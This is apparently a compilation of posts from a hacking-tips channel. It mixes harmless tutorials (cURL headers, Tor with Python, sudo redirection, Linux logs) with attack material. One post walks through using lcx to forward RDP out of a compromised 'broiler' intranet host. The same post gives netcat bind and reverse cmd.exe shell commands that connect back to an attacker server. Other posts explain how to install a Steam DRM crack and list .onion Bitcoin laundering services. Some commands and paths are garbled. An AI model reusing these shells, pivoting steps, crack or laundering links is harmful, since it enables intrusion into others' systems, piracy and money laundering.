▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Undetected...How to transfer data in HTTP header ?
The HTTP headers can be manipulated with the cURL program , which has the -H 'HEADER: VALUE' option .

A) For example, if we want to pass to the localhost / headers.php page a header named “ undercode ” with the value “ Hello! How are you? ", Then just run the following command:

curl -H 'undercode: Hello! How are you?' localhost/headers.php
I'll show an example of exchanging data with a local web server.

B) If you have Kali Linux (and any Debian derivatives in general), then to start the web server run:

sudo systemctl start apache2.service

C) If you have Arch Linux / BlackArch, then to start the web server run:

sudo systemctl start httpd.service
Now create a headers.php file . To do this in Kali Linux:

sudo gedit /var/www/html/headers.php

D) On Arch Linux / BlackArch:

sudo gedit /srv/http/headers.php
And copy the following into it:

<?php

$headers = apache_request_headers();
if (isset($headers["undercode"])) {
echo $headers["undercode"];
}

E) That is, the script simply outputs the value of the Hackware header (if received).

If you open http: //localhost/headers.php in a web browser , a blank page will be displayed - nothing was received, and therefore nothing was displayed.

F) Let's run the command already discussed above, in which we pass the undercode header:

curl -H 'undercode: Hello! How are you?' localhost/headers.php

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Detailed introduction and usage of lcx port forwarding (lcx intranet forwarding posture):

A) Let's first explain in detail the LXC forwarding tools and usage methods:

lcx.exe is a port forwarding tool, which is equivalent to forwarding port 3389 on broiler A to machine B.
Of course, machine B must have an external network IP. In this way, the 3389 degree port of link B is equivalent to the 3389 of link A.

usage:

For example, monitor -listen 51 3389 on local machine B, and run -slave
local ip 51 broiler ip 3389 on broiler A, then you can connect the broiler's 3389 locally by connecting 127.0.0.1. The second is the local steering.
Example: Now there is a websehll with an IP of 222.221.221.22. Port 3389 is opened by port scanning,
but we can't connect normally when we enter the Internet IP. Then it is very likely to be the intranet server. We can see that we dos execute ipconfig.

B) Upload lcx.exe to broiler and then cx.exe -listen 51 3389 means to monitor port 51 and forward to port 3389.
The display is as follows [+] Listening port 51 ……
[+] Listen OK!
[+] Listening port 3389 ……
[+] Listen OK!
[+] Waiting for Client on port: 51 ……
Then run lcx.exe on the broiler -slave Your IP 51 222.221.221.22 3389
222.221.221.22 is the broiler IP I used for example. Replace it with yours.. After running, this machine monitors the port.
The following information is displayed
[+] Listening port 51 ……
[+] Listen OK!
[+] Listening port 3389 ……
[+] Listen OK!
[+] Waiting for Client on port: 51 ……
[+] Accept a Client on port 55 from 222.221.221.22 ……
[+] Waiting another Client on port:3389….
Ok. Now link to 127.0.0.1 on your own machine or enter your own IP. It is
found that it is not your own machine, (or your own machine at all Can't connect), but broiler A! Advantages, get the intranet broiler.
Disadvantages, a little troublesome, and every time you have to port forward through sqltools. Of course, you can also use rebound Trojans to control broilers

C) The following is a supplement from other netizens:

Native: lcx -listen 2222 3333

2222 is the forwarding port, and 3333 is any unoccupied port of the machine

Broiler: lcx -slave 119.75.217.56 2222 127.0.0.1 3389

119.75.217.56 is the local IP, 2222 is the forwarding port, 127.0.0.1 is the broiler intranet IP, and 3389 is the remote terminal port

3389 format when connected 127.0.0.1:3333

D) Intranet forwarding gesture

1. Use of lcx

1. Execute on broiler: lcx.exe –slave public network ip + port broiler ip + port

For example: lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389

It means to forward the 3389 port of the broiler to the 10000 port of the xxx.xxx.xxx.xxx public network

2. Execute Lcx.exe –listen 10000 10001 on the public IP machine

For example: Lcx.exe –listen 10001 10000

It means to listen to the 10001 port request on the public network ip machine and transmit the 10001 request to the 10000 port.

At this time, for RDP connection, you only need to enter 127.0.0.1:10000 to connect to the broiler remotely.

E) Two, nc rebound cmdshell

1. Open the broiler agent to execute cmdshell

Execute nc -l -p 2333 -t -e cmd.exe on the broiler

This means that the broiler monitors the local port 2333, and the response executes the cmd.exe program through telnet (-t) mode

Execute nc -nvv broiler ip 2333 on your own public network server

2. Reverse proxy execute cmdshell

Run nc -l -p 2333 on the public network server

It means to monitor the local port 2333 and log in to other computers on the stage

Execute nc -t -e cmd.exe on the broiler, public network server ip 2333

It means that the broiler can execute the cmd.exe program in telnet mode, and can give the execution right to the public network server through port 2333

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

This script should be used only for fair purposes like making your own backup copies of games you own on your account.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) clone https://github.com/ZeDoCaixao/activate

2) Copy latest ACTiVATED crack .so-files to $HOME/.local/share/activate/x86/libsteam_api.so and $HOME/.local/share/activate/x86_64/libsteam_api.so. Copy script file (activate) anywhere in your $PATH, e.g. /usr/local/bin.

3) Go to game directory and enter activate. The script may ask for AppID if it can't find it. That's it.

cd ~/Games/SuperSteamGame
activate

4) It will replace libsteam_api.so files with ACTiVATED crack (of right architecture), detect a version of Steam interfaces and fill activated.ini files with right interfaces section.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑⬛️ GoScan: interactive network scanner:

GoScan: an interactive network scanner client
GoScan Network Scanner is especially suitable for unstable environments such as: unstable and unreliable network connection, no available connections, etc.).

It uses a SQLite database to run scans, monitor and maintain health.

In addition, the scan runs in the background (disconnected from the main thread), so even if the connection to the machine running GoScan is lost, the results can be downloaded asynchronously.

Features:
Interactive network scanner with autocomplete,
Suitable for everyday and professional tasks,
Capable of host detection, port scans and service enumeration (integrates many tools such as: EyeWitness, Hydra, nikto, etc.)
Scanning is performed in the background, in case of connection loss, you can download the results asynchronously (there is no need to restart the process, data can be imported at different stages),
Supports all major stages of network enumeration,
and much more.
External Integrations [Service Support]
ARP: nmap
DNS: nmap, dnsrecon, dnsenum, host
FINGER: nmap, finger-user-enum
FTP: nmap, ftp-user-enum, hydra [AGGRESIVE]
HTTP: nmap, nikto, dirb, EyeWitness, SQLmap, fimap
RDP: nmap, EyeWitness
SMB: nmap, enum4linux, nbtscan, samrdump
SMTP: nmap, smtp-user-enum
SNMP: nmap, snmpcheck, onesixtyone, snmpwalk
SSH: hydra [AGGRESIVE]
SQL: nmap
VNC: EyeWitnes

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) Building from source

Clone the repo: If you want to create a multiplatform binary, run:

$ git clone https://github.com/marco-lancini/goscan.git

2) Change to the GoScan directory and build it:

$ cd goscan / goscan /
$ make setup
$ make build

3) If you want to create a multi-platform binary, run:

$ make cross

🦑Installing the binary
This is the recommended installation method.

1) $ wget https://github.com/marcolancini/goscan/releases/download/v2.3/goscan_2.3_linux_amd64.zip $ unzip goscan_2.3_linux_amd64.zip
Then put the executable in PATH:

2) $ chmod + x goscan

3) $ sudo mv ./goscan / usr / local / bin / goscan

4) choose option via numbers
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🌐 Using Tor with Python :

1) download https://www.torproject.org/download/tor/

2) Install Python requests
We need Python requests

You can install it using the following commands:

pip install requests
pip install requests [socks]
pip install requests [security]
Python code working with TOR
The following Python code allows you to run TOR and Python together.

We will use the requests library to execute requests.

3) Make sure you have TOR running before running the code.

import requests

domain = "https://itsecforu.ru"
#define your proxies
#the socks5h method allows the socks server to translate the #hostname. So make sure that you add 'socks5h'.
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
a = requests.get(domain.strip(), proxies=proxies).text
print(a)
When can you use this
There can be various reasons why you might want to use TOR and Python together.

4) Python itself is just a programming language, and if it works in Python, then most likely the same approach will work in other programming languages ​​as well.

use case 1: crawler
You can use this code to create your own Python crawler via TOR.

Just create a list or dictionary of URLs you want to visit and instruct the tool to use your list.

myurls = ['url1','url2','url3','url4']
for url in myurls:
#dosomething
use case 2: Forensics
In some cases, you may only be interested in the text.

5) The code allows you to load entire pages without viewing visual content.

This can be a big advantage in some use cases.

my_interest = ['keyword1','keyword2','keyword3','keyword4']
for keyword in my_interest:
if keyword in a:
#dosomething

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Apple challenges smart speaker champion Amazon, “key” is UWB.
#international

Many Vulnerabilities have been patched in new Cisco Updates.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🚫 A look at how credit card information can be stolen and how to keep you safe :

1) Cloning maps
Making a cloned credit card is the easiest way for a thief to spend someone else's money.

All they have to do is temporarily access your credit card (often in fractions of a minute) and program it onto another prepaid card.

The cloned cards can then be sold on the darknet, usually through cryptocurrency.

Many of these stolen cards resemble real cards, and the attention to detail is mind-boggling.

2) How can this be prevented?

To prevent credit card cloning, try not to transfer your credit card to another person unless it is an emergency.

Many restaurants, clubs and bars now have desktop payment terminals.

Change your PIN regularly and keep track of small unaccounted charges on your credit card with SMS alerts or alerts from the bank app on your phone.

Many thieves made small spending on a cloned credit card at first in order to make a big purchase later.

This gives you at least a lower risk for this problem.

3) Skimming cards
Breathing in the neck of credit card cloning, ATM skimming is one of the most common ways to get credit and debit card data.

It typically uses magnetic stripe cards rather than chip and pin code cards, but as the story suggests, thieves can also install a mini camera on the skimmer to capture the pin number.

Skimmers can also be placed in the shadow terminal of the point of sale and are not detectable with the naked eye.

Law enforcement usually monitors thieves using this method, but skimming remains a fairly popular way of collecting data from someone's credit card.

You are more vulnerable if you are traveling to a country where the police turn a blind eye to such crimes.

4) Formjacking
The digital equivalent of ATM skimming, "formjacking" is a term Symantec uses to refer to hackers who steal credit card information from checkout pages on websites.

They usually install malicious software, usually JavaScript code, to remove credit card numbers.

Cryptojacking is another similar term that refers to the withdrawal of cryptocurrency details.

Formjacking became a threat in 2019-2020 as leading websites such as British Airways, Ticketmaster, Home Depot, Target, and Feedify reported hacking incidents.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

KISA holds a seminar to strengthen information protection capabilities in the Arab region.
#international

Cybercrime Heaven Dark Web leaks account information of 798 Korean websites.
#Leaks

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WINDOWS POPULAR PORTS USED BY ATTACKERS :

TCP port 21 — FTP (File Transfer Protocol)

TCP port 22 — SSH (Secure Shell)

TCP port 23 — Telnet

TCP port 25 — SMTP (Simple Mail Transfer Protocol)

TCP and UDP port 53 — DNS (Domain Name System)

TCP port 443 — HTTP (Hypertext Transport Protocol) and HTTPS (HTTP over SSL)

TCP port 110 — POP3 (Post Office Protocol version 3)

TCP and UDP port 135 — Windows RPC

TCP and UDP ports 137–139 — Windows NetBIOS over TCP/IP

TCP port 1433 and UDP port 1434 — Microsoft SQL Server

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to use Sudo when used with Output Redirection or Pipe:

A) When using sudo with output redirection (>) or pipe (|), bash displays a Permission denied error message.

B) Next, I'll show you different ways to solve this problem.

Use sudo with tree
For example, to redirect the output from echo 1 to ip_forward, run:

$ sudo echo 1> / proc / sys / net / ipv4 / ip_forward
bash: / proc / sys / net / ipv4 / ip_forward: Permission denied
The above sudo command resulted in a permission denied error because the redirection is done by a shell that doesn't have write permission.

C) We can use the sudo command with the tee command to fix this error:

$ echo 1 | sudo tee / proc / sys / net / ipv4 / ip_forward
With the approach described above, the command executed before the pipe will not be executed as the root user (echo 1).

D) This is useful if you just want the output of a program that does not require root privileges.

If the command before the channel requires root, we could use sudo before each command, for example:

$ sudo echo 1 | sudo tee / proc / sys / net / ipv4 / ip_forward> / dev / null

E) A similar approach that we can use to write "1" to the file "ip_forward" as in the previous examples is to level up the write process to the file.

Here's an example:

$ sudo tee / proc / sys / net / ipv4 / ip_forward> / dev / null << EOF
1
EOF

Start the shell with sudo -c

F) Another popular approach is to start another shell as root with the -c option.

Example:

$ sudo sh -c 'echo 1> / proc / sys / net / ipv4 / ip_forward'
Start the shell with sudo -s

G) Another way is to start a shell with sudo -s and then execute the command:

$ sudo -s
# echo 1> / proc / sys / net / ipv4 / ip_forward
# ^ D
$
With a Bash script
Another way to run sudo with a redirect or pipe is to create a bash script with all your commands and run that script with sudo.

Let's see how we can implement this.

First, we need to create a new file using any text editor like nano, vim, gedit or whatever.

Let's call it myscript.sh.

Then paste the following commands into myscript.sh and save the file:

#! / bin / sh
echo 1> / proc / sys / net / ipv4 / ip_forward
Now you just need to run the myscript.sh file using the sudo command:

$ sudo myscript.sh

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BTC- DEEP WEBSITES:

http://ow24et3tetp6tvmk.onion/ – OnionWallet – Anonymous Bitcoin Wallet and Bitcoin Laundry

http://nr6juudpp4as4gjg.onion/pptobtc.html – PayPal to BitCoins

http://nr6juudpp4as4gjg.onion/doublecoins.html – Double Your BitCoins

http://tfwdi3izigxllure.onion/ – Apples 4 Bitcoin

http://fogcore5n3ov3tui.onion/ – Bitcoin Fog – Bitcoin Laundry

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME CMD COMMANDS USED BI HACKERS:

1) Copy Path on Folder Drop.

I had a file buried in C:\xampp\htdocs\Vonster\wp-content\themes\twentytwelve that I needed but look at that folder path: if I manually type it I’ll instantly make myself susceptible to all kinds of typos plus I’m lazy and couldn’t care less about typing folder paths.

To paste the full path, just drag the folder and drop it into the command prompt.

In my case I typed cd in the command prompt and then dragged my folder into the command window.

2) View history with F7
One way to recount the list of commands you typed during a session is to press the up and down arrow keys. Up goes back in time and Down moves forward to the present. You probably already knew that; however, there’s an alternate way that can save you a few keystrokes.

Pressing F7 lets you see your 10 most recent commands in a single glance. Now you can arrow up or down and press enter on the exact command you need to recall.

3) Pretty Print the Current Directory
Whenever you want to view the directory contents you type dir but sometimes you just want to view the structure without the datestamps and file sizes. Welcome to the tree /a command.

tree let’s you view all the folders and subfolders of the current directory as a rudimentary ASCII art print out.

Since the output is usually long, I always add the redirection operator to send the results to a file.

Command Prompt tree /a commandCommand Prompt tree /a command

And here’s the text file I saved the output to.

I entered this command from C:\xampp\htdocs\Vonster. If I entered it from C:\xampp\htdocs\ I would get every folder and subfolder in the htdocs parent

tree /a > c:\vonsterWebsite.txt
Command Prompt tree /a command outputCommand Prompt tree /a command output

4) Send Command Output to the Clipboard
A related command is the clip option. After any command insert a space then type the vertical pipe (it’s right below the backspace and shares a key with the backslash). After the pipe insert another space and type clip.

For example to send the ipconfig results to your clipboard rather than the command prompt window – type this:

ipconfig /all | clip
Send Output to the ClipboardSend Output to the Clipboard

5) Get Help
The quick way to get help on a command is to tack on a baskslash and question mark.

For example, let’s say I want to use netsh but I forgot how to view all the Wireless Profiles on my computer.

I enter:

netsh /?


Reference: https://sites.google.com/site/betheboos/home/command-prompt-hacks-and-tricks-xp
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑In Linux systems, there are three main types of logging subsystems:

1) Connection time log: It is executed by multiple programs, and records are written to /var/log/wtmp and /var/run/utmp. Programs such as login will update the wtmp and utmp files so that the system administrator can track who is where Log in to the system when (The utmp and wtmp log files are the key to most Linux log subsystems. They save the user login and logout records. Information about the currently logged-in user is recorded in the file utmp; login and logout are recorded in the file wtmp; data exchange , Shutdown and restart machine information are also recorded in the wtmp file. All records include a time stamp.)

2) Process statistics: executed by the system kernel, when a process terminates, a record is written to the process statistics file (pacct or acct) for each process. The purpose of process statistics is to provide command usage statistics for basic services in the system.

3) Error log: Executed by the syslogd (8) daemon, various system daemons, user programs and kernels report notable events to the file /var/log/messages through the syslogd (3) daemon. In addition, many Unix programs create logs. Servers that provide network services like HTTP and FTP also maintain detailed logs.

Log directory: /var/log (default directory)

View process log cat /var/log/messagesp4

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁